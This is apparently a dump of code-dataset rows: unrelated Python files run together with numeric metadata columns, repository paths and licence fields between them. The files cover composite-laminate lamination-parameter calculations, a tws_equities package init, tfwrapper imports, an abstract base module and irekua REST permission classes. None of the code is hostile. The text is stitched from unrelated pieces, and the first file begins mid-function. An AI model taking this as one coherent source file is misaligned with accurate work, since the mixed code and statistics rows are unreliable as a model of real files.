# print('panel.n_plies_per_group[inner_step]',
# panel.n_plies_per_group[inner_step])
raise Exception("""
The input stacking sequences do not have the correct number of plies.""")
delta_lampam = np.zeros((multipanel.n_panels, 12), dtype=float)
for ind_panel, panel in enumerate(multipanel.panels):
if panel.middle_ply != 0 and inner_step == multipanel.reduced.n_groups - 1:
delta_lampam[ind_panel] = calc_delta_lampam(
ss=ss[ind_panel],
n_first_ply=panel.n_first_plies[inner_step],
n_plies_group=panel.n_plies_per_group[inner_step],
n_plies_in_panels=panel.n_plies, constraints=constraints,
middle_ply=panel.middle_ply)
else:
delta_lampam[ind_panel] = calc_delta_lampam(
ss=np.array(ss[ind_panel], int),
n_first_ply=panel.n_first_plies[inner_step],
n_plies_group=panel.n_plies_per_group[inner_step],
n_plies_in_panels=panel.n_plies, constraints=constraints,
middle_ply=0)
return delta_lampam
def calc_delta_lampam_mp_2(ss, multipanel, constraints, ss2=None):
"""
returns lamination parameter components associated to the outer plies used
for damage tolerance for a multi-panel structure
OUTPUTS
- delta_lampam: array storing the sublaminate partial lamination parameters
INPUTS
- ss: list of arrays storing the fibre orientations of the two outer
plies of each panel
- multipanel: multi-panel structure
- constraints: design and manufacturing guidelines
"""
if len(ss) != multipanel.n_panels:
raise Exception("""
Incorrect number of input stacking sequences for the multipanel structure.""")
for ind_panel, panel in enumerate(multipanel.panels):
if ss[ind_panel].size != 2:
raise Exception("""
The input stacking sequences do not have a correct number of plies.""")
delta_lampam = np.zeros((multipanel.n_panels, 12), dtype=float)
ss = ss[0]
if constraints.sym:
for ind_panel, panel in enumerate(multipanel.panels):
delta_lampam[ind_panel] = calc_delta_lampam(
ss=ss,
n_first_ply=1,
n_plies_group=2,
n_plies_in_panels=panel.n_plies,
constraints=constraints,
middle_ply=0)
else:
ss2 = ss2[0]
for ind_panel, panel in enumerate(multipanel.panels):
delta_lampam[ind_panel] = calc_delta_lampam(
ss=ss,
n_first_ply=1,
n_plies_group=2,
n_plies_in_panels=panel.n_plies,
constraints=constraints,
middle_ply=0)
delta_lampam[ind_panel] += calc_delta_lampam(
ss=ss2,
n_first_ply=panel.n_plies - 1,
n_plies_group=2,
n_plies_in_panels=panel.n_plies,
constraints=constraints,
middle_ply=0)
return delta_lampam
def calc_delta_lampam_mp_3(
ss, n_first_ply, n_plies, constraints, middle_ply=0):
"""
returns lamination parameter components associated to a single ply in a
multi-panel structure. When the ply does not cover a panel, (indicated with
n_first_ply[ind_panel <= 0) the associated lamination parameters are zeros
OUTPUTS
- delta_lampam: array storing the partial lamination parameters
INPUTS
- ss: fibre orientation of the ply added to the multi-panel structure
- n_first_ply[ind_panel] = the number of the ply in each panel,
otherwise 0 if the patch does not cover some panels.
- n_plies: number of plies of the laminates of each panel
- constraints: design and manufacturing guidelines
- middle_ply[ind_panel] = 0 if there is no ply overlapping the mid-surface,
otherwise, middle_ply is equal to the position number of this ply
"""
n_panels = n_first_ply.size # number of panels
ss = np.array([ss])
delta_lampam = np.zeros((n_panels, 12), dtype=float)
if middle_ply == 0:
middle_ply = np.zeros((n_panels,))
for ind_panel in range(n_panels):
# print('ind_panel', ind_panel)
# print('n_first_ply[ind_panel]', n_first_ply[ind_panel])
if n_first_ply[ind_panel] > 0:
if middle_ply[ind_panel] == n_first_ply[ind_panel]: # a middle ply
delta_lampam[ind_panel] = calc_delta_lampam(
ss,
n_first_ply=n_first_ply[ind_panel],
n_plies_group=0,
n_plies_in_panels=n_plies[ind_panel],
constraints=constraints,
middle_ply=middle_ply[ind_panel])
else: # not a middle ply
delta_lampam[ind_panel] = calc_delta_lampam(
ss,
n_first_ply=n_first_ply[ind_panel],
n_plies_group=1,
n_plies_in_panels=n_plies[ind_panel],
constraints=constraints,
middle_ply=0)
return delta_lampam
def calc_delta_lampam_mp_3A(
ss, n_first_ply, n_plies, constraints, middle_ply=0):
"""
returns the in-plane lamination parameters associated to a single ply in a
multi-panel structure. When the ply does not cover a panel, (indicated with
n_first_ply[ind_panel <= 0) the associated lamination parameters are zeros
OUTPUTS
- delta_lampam: array storing the partial lamination parameters
INPUTS
- ss: fibre orientation of the ply added to the multi-panel structure
- n_first_ply[ind_panel] = the number of the ply in each panel,
otherwise 0 if the patch does not cover some panels.
- n_plies: number of plies of the laminates of each panel
- constraints: design and manufacturing guidelines
- middle_ply[ind_panel] = 0 if there is no ply overlapping the mid-surface,
otherwise, middle_ply is equal to the position number of this ply
"""
n_panels = n_first_ply.size # number of panels
ss = np.array([ss])
delta_lampam = np.zeros((n_panels, 4), dtype=float)
if middle_ply == 0:
middle_ply = np.zeros((n_panels,))
for ind_panel in range(n_panels):
if n_first_ply[ind_panel] > 0:
if middle_ply[ind_panel] == n_first_ply[ind_panel]: # a middle ply
delta_lampam[ind_panel] = calc_delta_lampamA(
ss,
n_first_ply=n_first_ply[ind_panel],
n_plies_group=0,
n_plies_in_panels=n_plies[ind_panel],
constraints=constraints,
middle_ply=middle_ply[ind_panel])
else: # not a middle ply
delta_lampam[ind_panel] = calc_delta_lampamA(
ss,
n_first_ply=n_first_ply[ind_panel],
n_plies_group=1,
n_plies_in_panels=n_plies[ind_panel],
constraints=constraints,
middle_ply=0)
return delta_lampam
def calc_delta_lampam_mp_3D(
ss, n_first_ply, n_plies, constraints, middle_ply=0):
"""
returns the out-of-plane lamination parameters associated to a single ply
in a multi-panel structure. When the ply does not cover a panel,
(indicated with n_first_ply[ind_panel <= 0) the associated lamination
parameters are zeros
OUTPUTS
- delta_lampam: array storing the partial lamination parameters
INPUTS
- ss: fibre orientation of the ply added to the multi-panel structure
- n_first_ply[ind_panel] = the number of the ply in each panel,
otherwise 0 if the patch does not cover some panels.
- n_plies: number of plies of the laminates of each panel
- constraints: design and manufacturing guidelines
- middle_ply[ind_panel] = 0 if there is no ply overlapping the mid-surface,
otherwise, middle_ply is equal to the position number of this ply
"""
n_panels = n_first_ply.size # number of panels
ss = np.array([ss])
delta_lampam = np.zeros((n_panels, 4), dtype=float)
if middle_ply == 0:
middle_ply = np.zeros((n_panels,))
for ind_panel in range(n_panels):
if n_first_ply[ind_panel] > 0:
if middle_ply[ind_panel] == n_first_ply[ind_panel]: # a middle ply
delta_lampam[ind_panel] = calc_delta_lampamD(
ss,
n_first_ply=n_first_ply[ind_panel],
n_plies_group=0,
n_plies_in_panels=n_plies[ind_panel],
constraints=constraints,
middle_ply=middle_ply[ind_panel])
else: # not a middle ply
delta_lampam[ind_panel] = calc_delta_lampamD(
ss,
n_first_ply=n_first_ply[ind_panel],
n_plies_group=1,
n_plies_in_panels=n_plies[ind_panel],
constraints=constraints,
middle_ply=0)
return delta_lampam
def calc_delta_lampam_tab(
angle, n_first_ply, n_plies_group, N, constraints, middle_ply=0):
'''
returns the partial lamination parameters for groups of plies of uniform
thickness taking into account the two symmetric parts for symmetric
laminates
OUTPUTS
- delta_lampam_tab: partial lamination parameters
INPUTS
- angle: the sublaminate stacking sequences columnby column
- n_first_ply is the phe position of the first ply of the sublaminate with
a numbering starting from the bottom to the top of the laminate (scalar)
- n_plies_group: number of plies consisting the sublaminate (scalar)
- N: total number of plies for the laminate (scalar)
- middle_ply: 0 if there is no ply overlapping the mid-surface, otherwise,
middle_ply is equal to the position number of this ply
'''
if n_plies_group > angle.size:
raise Exception("""
The input set of angles have fewer elements that what is asked to be checked
""")
if n_plies_group + n_first_ply - 1 > N:
raise Exception("""
The sublaminate is not properly defined as to be contained within the laminate
""")
size_delta_lampam_tab = angle.shape[0]
delta_lampam_tab = np.empty((size_delta_lampam_tab, 12), dtype=float)
for ii in np.arange(size_delta_lampam_tab):
delta_lampam_tab[ii] = calc_delta_lampam(
angle[ii],
n_first_ply,
n_plies_group,
N,
constraints,
middle_ply)
return delta_lampam_tab
def calc_delta_lampam_tab_t(angle, position_top, thickness, n_plies_group,
constraints, middle_ply=0):
'''
returns the partial lamination parameters for groups of plies of varying
thickness taking into account the two symmetric parts for symmetric
laminates
OUTPUTS
- delta_lampam_tab: sublaminate lamination parameters (line by line)
INPUTS
- angle: sublaminate stacking sequence
- position_top normalized position of the top of the sublaminate
- thickness: thicknesses of the plies
- n_plies_group: ply count of the sublaminate (scalar), does not account
for middle_ply !
- constraints: set of constraints
- middle_ply: 0 if there is no ply overlapping the mid-surface, otherwise,
middle_ply is equal to the position number of this ply
'''
if n_plies_group > angle.size:
raise Exception("""
The input set of angles have fewer elements that what is asked to be checked
""")
size_delta_lampam_tab = angle.shape[0]
delta_lampam_tab = np.empty((size_delta_lampam_tab, 12), float)
for ii in np.arange(size_delta_lampam_tab):
delta_lampam_tab[ii] = calc_delta_lampam_tab_t_1(
np.array(angle[ii]),
position_top,
thickness,
n_plies_group,
constraints,
middle_ply)
return delta_lampam_tab
def calc_delta_lampam_tab_t_1(angle, position_top, thickness, n_plies_group,
constraints, middle_ply=0):
'''
returns the partial lamination parameters for a group of plies of varying
thickness taking into account the two symmetric parts for symmetric
laminates
OUTPUTS
- delta_lampam: sublaminate partial lamination parameters
INPUTS
- angle: sublaminate stacking sequence
- position_top: normalized position of the top of the sublaminate
- thickness: thicknesses of the plies
- n_plies_group: ply count of the sublaminate (scalar), does not account
for middle_ply !
- constraints: set of constraints
- middle_ply: 0 if there is no ply overlapping the mid-surface, otherwise,
middle_ply is equal to the position number of this ply
'''
# print('angle.size', angle.size)
# print('angle.shape', angle.shape)
if angle.size == 0:
return np.zeros((12,), float)
if constraints.sym:
if position_top - sum(thickness) < -1e-14:
raise Exception("""
The sublaminate is not properly defined as to be contained within the laminate
""")
else:
if position_top - sum(thickness) < -1 -1e-14:
raise Exception("""
The sublaminate is not properly defined as to be contained within the laminate
""")
for_the_top = np.array([position_top])
for i in range(n_plies_group):
for_the_top = np.hstack((for_the_top, for_the_top[-1] - thickness[i]))
for_the_bot = for_the_top[1:]
for_the_top = np.delete(for_the_top, np.s_[-1], axis=0)
cos_sin = np.empty((4, n_plies_group), float)
for ind in range(n_plies_group):
cos_sin[:, ind] = constraints.cos_sin[
constraints.ind_angles_dict[angle[ind]]].reshape((4, ))
z_0 = for_the_top - for_the_bot
z_2 = for_the_top**3 - for_the_bot**3
if constraints.sym: #
delta_lampam = np.array([
np.matmul(cos_sin, z_0),
np.zeros((4,), dtype=float),
np.matmul(cos_sin, z_2)]).reshape(12)
# Add the contribution of a ply overlapping the middle surface
if middle_ply != 0:
if angle.size == n_plies_group + 1:
cos_sin_mid = constraints.cos_sin[
constraints.ind_angles_dict[angle[-1]]]
delta_lampam += np.array([
(for_the_bot[-1])*cos_sin_mid,
np.zeros((4,), dtype=float),
(for_the_bot[-1]**3)*cos_sin_mid]).reshape(12)
else:
raise Exception("""
The ply orientation of the middle-ply is not given as input""")
return delta_lampam
z_1 = -(for_the_top**2 - for_the_bot**2)
# - correction because the gradual approach uses a top-to-bottom convention
delta_lampam = 0.5*np.array([
np.matmul(cos_sin, z_0),
np.matmul(cos_sin, z_1),
np.matmul(cos_sin, z_2)]).reshape(12)
return delta_lampam
if __name__ == "__main__":
constraints = Constraints(
sym=False,
set_of_angles=np.array([0, 45, 90, -45]))
parameters = Parameters(constraints=constraints,
group_size_min=10, group_size_max=20)
print('\n*** Test for the function filter_lampam ***\n')
# lampam = np.arange(1, 13)
# lampam = np.arange(1, 25).reshape((2, 12))
# print('Lamination parameters:\n')
# lampam = filter_lampam(lampam, constraints)
# print_lampam(lampam[1])
print('\n*** Test for the function calc_lampam ***\n')
print('Input stacking sequence:\n')
ss = np.array([45, 90, 45, 45, 0, -45, -45, 0, 90, -45])
print(f'{ss}\n')
print('Lamination parameters:\n')
lampam = calc_lampam(ss)
print_lampam(lampam)
print('\n*** Test for the function calc_lampam_mp ***\n')
# ss_target1 = np.array([0, 0, 0, 0])
# ss_target2 = np.array([0, 0, 90, 0, 0])
# sslist = [ss_target1, ss_target2]
# print(f'sslist: {sslist}')
# print('Lamination parameter outputs:\n')
# lampam = calc_lampam_mp(sslist, constraints)
# print_lampam(lampam[0])
# print_lampam(lampam[1])
print('\n*** Test for the function test_lampam ***\n')
# print('Input stacking sequence:\n')
# ss = np.array([0, 0, 90, 0, 0])
# ss_top = [ss, ss]
# n_plies_per_panel = [20, 10]
# print(f'{ss}\n')
# print('Lamination parameters:\n')
# lampam = test_lampam(ss_top, n_plies_per_panel)
# print_lampam(lampam[0], lampam[1])
print("""\n*** Test for the functions:
calc_delta_lampam
calc_delta_lampamA
calc_delta_lampamD ***\n""")
# print('Input stacking sequence:\n')
# ss = np.array([0, 0, 0, 0, 90, 90, 90, 0, 0, 0, 0])
# n_first_ply = 1
# n_plies_group = 5
# n_plies_in_panels = 10
# print(f'{ss}\n')
# print('Lamination parameters:\n')
# lampam = calc_delta_lampam(
# ss, n_first_ply, n_plies_group, n_plies_in_panels, constraints,
# middle_ply=0)
# print_lampam(lampam)
# lampamA = calc_delta_lampamA(
# ss, n_first_ply, n_plies_group, n_plies_in_panels, constraints,
# middle_ply=0)
# print(lampamA)
# lampamD = calc_delta_lampamD(
# ss, n_first_ply, n_plies_group, n_plies_in_panels, constraints,
# middle_ply=0)
# print(lampamD)
print('\n*** Test for the function calc_delta_lampam_mp ***\n')
# print('Inputs:\n')
# group_size_min = 4
# # Desired number of plies for the groups at each outer loop
# group_size_max = 10
# # Maximum number of ply drop layouts to test for each group search
# n_pdl_max = 5
# # Relative importance of the lamination parameters from the global level
# global_sensitivities = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])
# parameters = Parameters(
# constraints=constraints, n_outer_step=1, group_size_min=4,
# group_size_max=10, sensitivities=global_sensitivities,
# n_pdl_max=2, n_panels=2)
# ss_target1 = np.zeros((10,))
# n_plies_target1 = ss_target1.size
# ss_target2 = np.zeros((8,))
# n_plies_target2 = ss_target2.size
# lampam_target1 = calc_lampam(ss_target1, constraints)
# lampam_target2 = calc_lampam(ss_target2, constraints)
# boundaries = np.array([[1, 0]])
# panel_1 = Panel(
# lampam_target=lampam_target1, n_plies=n_plies_target1, area=1,
# constraints=constraints)
# panel_2 = Panel(
# lampam_target=lampam_target2, n_plies=n_plies_target2, area=1,
# constraints)
# multipanel = MultiPanel(panels=[panel_1, panel_2])
# constraints.sym = False
# divide_panels_2(multipanel, parameters, constraints, 0)
# ss = [np.array([0, 0, 0, 0, 90, 90, 0, 0, 0, 0]),
# np.array([0, 0, -45, -45, 90, 0, 45, 0])]
# inner_step = -1
# print(f'ss: {ss}')
# print(f'sym: {sym}\n')
# print('Lamination parameter outputs:\n')
# print(calc_delta_lampam_mp(
# ss, multipanel, constraints=constraints, inner_step=inner_step))
# print('\n*** Test for the function calc_delta_lampam_mp_2 ***\n')
# print('Inputs:\n')
# constraints.sym = True
# ss_target1 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
# n_plies_target1 = ss_target1.size
# ss_target2 = np.array([0, 0, 0, 0, 0, 0, 0, 0])
# n_plies_target2 = ss_target2.size
# lampam_target1 = calc_lampam(ss_target1, constraints)
# lampam_target2 = calc_lampam(ss_target2, constraints)
# boundaries = np.array([[1, 0]])
# panel_1 = Panel(
# lampam_target=lampam_target1, n_plies=n_plies_target1, area=1,
# constraints=constraints)
# panel_2 = Panel(
# lampam_target=lampam_target2, n_plies=n_plies_target2, area=1,
# constraints=constraints)
# multipanel = MultiPanel(panels=[panel_1, panel_2])
# divide_panels_2(multipanel, parameters, constraints, 0)
# a = np.array([45, -45])
# ss = [np.copy(a) for ind_panel in range(multipanel.n_panels)]
# sym = True
# print(f'ss: {ss}')
# print(f'sym: {sym}\n')
# print('Lamination parameter outputs:\n')
# print(calc_delta_lampam_mp_2(ss, multipanel, constraints))
#
# print("""\n*** Test for the functions:
# calc_delta_lampam_mp_3
# calc_delta_lampam_mp_3A
# calc_delta_lampam_mp_3D ***\n""")
# print('Inputs:\n')
# ss = 0
# n_first_ply = np.array([1, 5, 0])
# n_plies = np.array([10, 10, 10])
# sym = True
# print(f'ss: {ss}')
# print(f'n_plies: {n_plies}')
# print(f'n_first_ply: {n_first_ply}')
# print(f'sym: {sym}\n')
# print('Lamination parameter outputs:\n')
# print_lampam(calc_delta_lampam_mp_3(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
# print_lampam(calc_delta_lampam_mp_3(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
# print_lampam(calc_delta_lampam_mp_3(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[2])
# ss = 0
# n_first_ply = np.array([2, 2])
# n_plies = np.array([10, 6])
# sym = True
# print_lampam(calc_delta_lampam_mp_3(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
# print_lampam(calc_delta_lampam_mp_3(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
# ss = 0
# n_first_ply = np.array([1, 5, 0])
# n_plies = np.array([10, 10, 10])
# sym = True
# print(calc_delta_lampam_mp_3A(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
# print(calc_delta_lampam_mp_3A(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
# print(calc_delta_lampam_mp_3A(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[2])
# ss = 0
# n_first_ply = np.array([2, 2])
# n_plies = np.array([10, 6])
# sym = True
# print(calc_delta_lampam_mp_3A(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
# print(calc_delta_lampam_mp_3A(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
# ss = 0
# n_first_ply = np.array([1, 5, 0])
# n_plies = np.array([10, 10, 10])
# sym = True
# print(calc_delta_lampam_mp_3D(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
# print(calc_delta_lampam_mp_3D(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
# print(calc_delta_lampam_mp_3D(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[2])
# ss = 0
# n_first_ply = np.array([2, 2])
# n_plies = np.array([10, 6])
# sym = True
# print(calc_delta_lampam_mp_3D(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
# print(calc_delta_lampam_mp_3D(
# ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
| 38.485762
| 83
| 0.655053
| 6,753
| 45,952
| 4.209685
| 0.046202
| 0.049599
| 0.028141
| 0.049247
| 0.869882
| 0.83759
| 0.811278
| 0.791614
| 0.767588
| 0.734557
| 0
| 0.0241
| 0.248716
| 45,952
| 1,193
| 84
| 38.518022
| 0.799351
| 0.453865
| 0
| 0.681818
| 0
| 0
| 0.068212
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037879
| false
| 0.007576
| 0.00947
| 0
| 0.106061
| 0.020833
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c45a29b83e992c2db9b153b6e98d5ad7fe3aa779
| 193
|
py
|
Python
|
tws_equities/helpers/__init__.py
|
ajmal017/TWS-Equities
|
12865df32726b1ae50875d800588a714c08de086
|
[
"MIT"
] | null | null | null |
tws_equities/helpers/__init__.py
|
ajmal017/TWS-Equities
|
12865df32726b1ae50875d800588a714c08de086
|
[
"MIT"
] | null | null | null |
tws_equities/helpers/__init__.py
|
ajmal017/TWS-Equities
|
12865df32726b1ae50875d800588a714c08de086
|
[
"MIT"
] | 5
|
2021-01-05T13:07:03.000Z
|
2021-02-16T18:03:05.000Z
|
# -*- coding: utf-8 -*-
from tws_equities.helpers.contract_maker import create_stock
from tws_equities.helpers.utils import *
HISTORICAL_DATA_STORAGE = join(PROJECT_ROOT, 'historical_data')
| 24.125
| 63
| 0.792746
| 26
| 193
| 5.576923
| 0.730769
| 0.096552
| 0.206897
| 0.303448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.103627
| 193
| 7
| 64
| 27.571429
| 0.83237
| 0.108808
| 0
| 0
| 0
| 0
| 0.088235
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c45c155ad9530aa8511d0138db88b6d13805def3
| 474
|
py
|
Python
|
utilities/tfwrapper/__init__.py
|
wong-ck/DeepSegment
|
01c04b2d80355b97d3494e0073ba35ef9c98e546
|
[
"MIT"
] | null | null | null |
utilities/tfwrapper/__init__.py
|
wong-ck/DeepSegment
|
01c04b2d80355b97d3494e0073ba35ef9c98e546
|
[
"MIT"
] | null | null | null |
utilities/tfwrapper/__init__.py
|
wong-ck/DeepSegment
|
01c04b2d80355b97d3494e0073ba35ef9c98e546
|
[
"MIT"
] | null | null | null |
# Written by Chun Kit Wong and CIRC under MIT license:
# https://github.com/wong-ck/DeepSegment/blob/master/LICENSE
from utilities.tfwrapper import model
from utilities.tfwrapper import layer
from utilities.tfwrapper import loss
from utilities.tfwrapper import optimizer
from utilities.tfwrapper import estimator
from utilities.tfwrapper import input_fn
from utilities.tfwrapper import hook
from utilities.tfwrapper import metric
from utilities.tfwrapper import summary
| 29.625
| 60
| 0.841772
| 65
| 474
| 6.123077
| 0.476923
| 0.29397
| 0.497487
| 0.633166
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111814
| 474
| 15
| 61
| 31.6
| 0.945368
| 0.234177
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c465bb661162e09c744b3b1fd66a2b3460cbf343
| 264
|
py
|
Python
|
medimodule/base.py
|
namyouth/MI2RLNet
|
1b17723706207d5f841e72d9a0bebfd6ec831c07
|
[
"Apache-2.0"
] | null | null | null |
medimodule/base.py
|
namyouth/MI2RLNet
|
1b17723706207d5f841e72d9a0bebfd6ec831c07
|
[
"Apache-2.0"
] | null | null | null |
medimodule/base.py
|
namyouth/MI2RLNet
|
1b17723706207d5f841e72d9a0bebfd6ec831c07
|
[
"Apache-2.0"
] | null | null | null |
from abc import *
class BaseModule(metaclass=ABCMeta):
@abstractmethod
def init(self, weight_path):
pass
@abstractmethod
def _preprocessing(self, path):
pass
@abstractmethod
def predict(self, img):
pass
| 16.5
| 36
| 0.613636
| 26
| 264
| 6.153846
| 0.653846
| 0.31875
| 0.275
| 0.3125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.310606
| 264
| 15
| 37
| 17.6
| 0.879121
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0.272727
| 0.090909
| 0
| 0.454545
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
09ffd708ba04880bfbb7dd5da2eef9fb4bd4d6b8
| 22
|
py
|
Python
|
libs/arthur/document/__init__.py
|
jaycode/Arthur.workspace
|
7a581104141ee5f556e058b1276b4087a2921dfc
|
[
"Apache-2.0"
] | null | null | null |
libs/arthur/document/__init__.py
|
jaycode/Arthur.workspace
|
7a581104141ee5f556e058b1276b4087a2921dfc
|
[
"Apache-2.0"
] | null | null | null |
libs/arthur/document/__init__.py
|
jaycode/Arthur.workspace
|
7a581104141ee5f556e058b1276b4087a2921dfc
|
[
"Apache-2.0"
] | null | null | null |
from document import *
| 22
| 22
| 0.818182
| 3
| 22
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 22
| 1
| 22
| 22
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6705d964c5ae71dbef28447d7b17cc4f8aaffe90
| 189
|
py
|
Python
|
py2swagger/plugins/drf/introspectors/__init__.py
|
eguven/py2swagger
|
729bc96557b217f48e78db4e78e561ee93eee17d
|
[
"MIT"
] | 29
|
2016-09-15T13:28:21.000Z
|
2022-01-06T14:48:48.000Z
|
py2swagger/plugins/drf/introspectors/__init__.py
|
eguven/py2swagger
|
729bc96557b217f48e78db4e78e561ee93eee17d
|
[
"MIT"
] | 3
|
2017-05-12T08:26:30.000Z
|
2021-09-21T16:33:34.000Z
|
py2swagger/plugins/drf/introspectors/__init__.py
|
eguven/py2swagger
|
729bc96557b217f48e78db4e78e561ee93eee17d
|
[
"MIT"
] | 8
|
2016-11-25T10:50:10.000Z
|
2020-10-30T20:24:34.000Z
|
from distutils.version import StrictVersion
from rest_framework import VERSION as REST_FRAMEWORK_VERSION
REST_FRAMEWORK_V3 = StrictVersion(REST_FRAMEWORK_VERSION) > StrictVersion('3.0.0')
| 37.8
| 82
| 0.857143
| 25
| 189
| 6.2
| 0.44
| 0.335484
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023121
| 0.084656
| 189
| 4
| 83
| 47.25
| 0.872832
| 0
| 0
| 0
| 0
| 0
| 0.026455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6756e833672d5fc65996f4205d09ac2ce70bfbc4
| 3,868
|
py
|
Python
|
irekua_rest_api/permissions/items.py
|
IslasGECI/irekua-rest-api
|
35cf5153ed7f54d12ebad2ac07d472585f04e3e7
|
[
"BSD-4-Clause"
] | null | null | null |
irekua_rest_api/permissions/items.py
|
IslasGECI/irekua-rest-api
|
35cf5153ed7f54d12ebad2ac07d472585f04e3e7
|
[
"BSD-4-Clause"
] | 11
|
2020-03-28T18:51:50.000Z
|
2022-01-13T01:47:40.000Z
|
irekua_rest_api/permissions/items.py
|
IslasGECI/irekua-rest-api
|
35cf5153ed7f54d12ebad2ac07d472585f04e3e7
|
[
"BSD-4-Clause"
] | 1
|
2021-05-06T19:38:14.000Z
|
2021-05-06T19:38:14.000Z
|
from rest_framework.permissions import BasePermission
from irekua_permissions.annotations import (
annotations as annotation_permissions)
class CanAnnotate(BasePermission):
def has_permission(self, request, view):
item = view.get_object()
user = request.user
return annotation_permissions.create(user, item=item)
class IsCreator(BasePermission):
def has_object_permission(self, request, view, obj):
user = request.user
return user == obj.created_by
class HasUpdatePermission(BasePermission):
def has_object_permission(self, request, view, obj):
user = request.user
sampling_event = obj.sampling_event_device.sampling_event
collection = sampling_event.collection
return collection.has_permission(user, 'change_collection_item')
class HasViewPermission(BasePermission):
def has_object_permission(self, request, view, obj):
user = request.user
sampling_event = obj.sampling_event_device.sampling_event
collection = sampling_event.collection
return collection.has_permission(user, 'view_collection_item')
class HasViewAnnotationsPermission(BasePermission):
def has_object_permission(self, request, view, obj):
user = request.user
sampling_event = obj.sampling_event_device.sampling_event
collection = sampling_event.collection
return collection.has_permission(user, 'view_collection_annotations')
class HasDownloadPermission(BasePermission):
def has_object_permission(self, request, view, obj):
user = request.user
sampling_event = obj.sampling_event_device.sampling_event
collection = sampling_event.collection
return collection.has_permission(user, 'download_collection_items')
class HasAddAnnotationPermission(BasePermission):
def has_object_permission(self, request, view, obj):
user = request.user
sampling_event = obj.sampling_event_device.sampling_event
collection = sampling_event.collection
return collection.has_permission(user, 'add_collection_annotation')
class IsCollectionAdmin(BasePermission):
def has_object_permission(self, request, view, obj):
user = request.user
sampling_event = obj.sampling_event_device.sampling_event
collection = sampling_event.collection
return collection.is_admin(user)
class IsCollectionTypeAdmin(BasePermission):
def has_object_permission(self, request, view, obj):
user = request.user
sampling_event = obj.sampling_event_device.sampling_event
collection = sampling_event.collection
collection_type = collection.collection_type
return collection_type.is_admin(user)
class ItemIsOpenToView(BasePermission):
def has_object_permission(self, request, view, obj):
licence = obj.licence
if not licence.is_active:
return True
licence_type = licence.licence_type
return licence_type.can_view
class ItemIsOpenToDownload(BasePermission):
def has_object_permission(self, request, view, obj):
licence = obj.licence
if not licence.is_active:
return True
licence_type = licence.licence_type
return licence_type.can_download
class ItemIsOpenToAnnotate(BasePermission):
def has_object_permission(self, request, view, obj):
licence = obj.licence
if not licence.is_active:
return True
licence_type = licence.licence_type
return licence_type.can_annotate
